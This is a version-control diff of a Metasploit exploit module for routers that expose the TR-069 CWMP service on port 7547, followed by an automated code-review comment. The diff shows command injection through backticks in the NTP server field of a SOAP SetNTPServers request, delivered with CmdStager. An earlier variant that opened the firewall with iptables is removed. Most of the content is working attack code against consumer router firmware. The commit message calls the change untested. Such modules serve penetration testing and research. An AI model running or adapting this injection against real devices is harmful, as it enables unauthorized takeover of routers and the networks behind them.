Use CmdStager instead
Oh, and this is totally untested as of this commit.
bug/bundler_fix
parent
8de17981c3
commit
4d6b2dfb46
|
@ -4,6 +4,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -20,6 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'Kenzo', # Vulnerability discovery and original Metasploit module
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>', # Copypasta from TheMoon msf module
|
||||
'todb', # Metasploit module
|
||||
'wvu' , # Metasploit module
|
||||
'0x27' # Metasploit module
|
||||
|
@ -54,34 +56,59 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(7547), # CWMP port
|
||||
Opt::RPORT(7547), # TR-069 CWMP port for SOAP/XML commands
|
||||
], self.class)
|
||||
|
||||
@data_cmd_template = "<?xml version=\"1.0\"?>"
|
||||
@data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
|
||||
@data_cmd_template << " <SOAP-ENV:Body>"
|
||||
@data_cmd_template << " <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
|
||||
@data_cmd_template << " <NewNTPServer1>%s</NewNTPServer1>"
|
||||
@data_cmd_template << " <NewNTPServer2></NewNTPServer2>"
|
||||
@data_cmd_template << " <NewNTPServer3></NewNTPServer3>"
|
||||
@data_cmd_template << " <NewNTPServer4></NewNTPServer4>"
|
||||
@data_cmd_template << " <NewNTPServer5></NewNTPServer5>"
|
||||
@data_cmd_template << " </u:SetNTPServers>"
|
||||
@data_cmd_template << " </SOAP-ENV:Body>"
|
||||
@data_cmd_template << "</SOAP-ENV:Envelope>"
|
||||
end
|
||||
|
||||
def set_new_ntp_server(cmd)
|
||||
template = "<?xml version=\"1.0\"?>"
|
||||
template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
|
||||
template << " <SOAP-ENV:Body>"
|
||||
template << " <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
|
||||
template << " <NewNTPServer1>`%s`</NewNTPServer1>" # Backticks, aw yeah
|
||||
template << " <NewNTPServer2></NewNTPServer2>"
|
||||
template << " <NewNTPServer3></NewNTPServer3>"
|
||||
template << " <NewNTPServer4></NewNTPServer4>"
|
||||
template << " <NewNTPServer5></NewNTPServer5>"
|
||||
template << " </u:SetNTPServers>"
|
||||
template << " </SOAP-ENV:Body>"
|
||||
template << "</SOAP-ENV:Envelope>"
|
||||
|
||||
template % cmd
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
uri = '/UD/act?1'
|
||||
soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
|
||||
injected_data = set_new_ntp_server(cmd)
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'ctype' => "text/xml",
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'SOAPAction' => soapaction,
|
||||
},
|
||||
'data' => injected_data
|
||||
}, 2)
|
||||
return res
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/globe'
|
||||
'uri' => '/globe' # TODO: Check this? Why not /UD/act?1
|
||||
})
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("A connection error has occured")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if res and res.code == 404 and res.body =~ /home_wan.htm/
|
||||
if res and res.code == 404 and res.body =~ /home_wan\.htm/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
|
@ -96,29 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
print_status("Exploiting...")
|
||||
print_status("Dropping firewall on port 80...")
|
||||
execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
|
||||
execute_command("tick.eircom.net","")
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
uri = '/UD/act?1'
|
||||
soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
|
||||
data_cmd = @data_cmd_template % "#{cmd}"
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'ctype' => "text/xml",
|
||||
'method' => 'POST',
|
||||
'headers' => {
|
||||
'SOAPAction' => soapaction,
|
||||
},
|
||||
'data' => data_cmd
|
||||
})
|
||||
return res
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
execute_cmdstager({:flavor => :echo})
|
||||
end
|
||||
|
||||
end
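Review bot: In the new `execute_command` the result of `send_request_cgi(..., 2)` is returned without being inspected, so a stager chunk that hits the 2-second timeout (nil response) or is refused by the device is lost silently, and `execute_cmdstager` presumably does not act on the return value either; log it before `return res` with `vprint_error("#{peer} - No response to command request") if res.nil?`. `set_new_ntp_server` also drops `cmd` into the XML text content unescaped, which only holds if the `:echo` flavor never emits `<` or `&` in a chunk — worth confirming, or recording next to the `# Backticks, aw yeah` comment, given the commit message says the change is untested. Minor: `vprint_error("A connection error has occured")` in `check` misspells "occurred".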
|
||||
|
|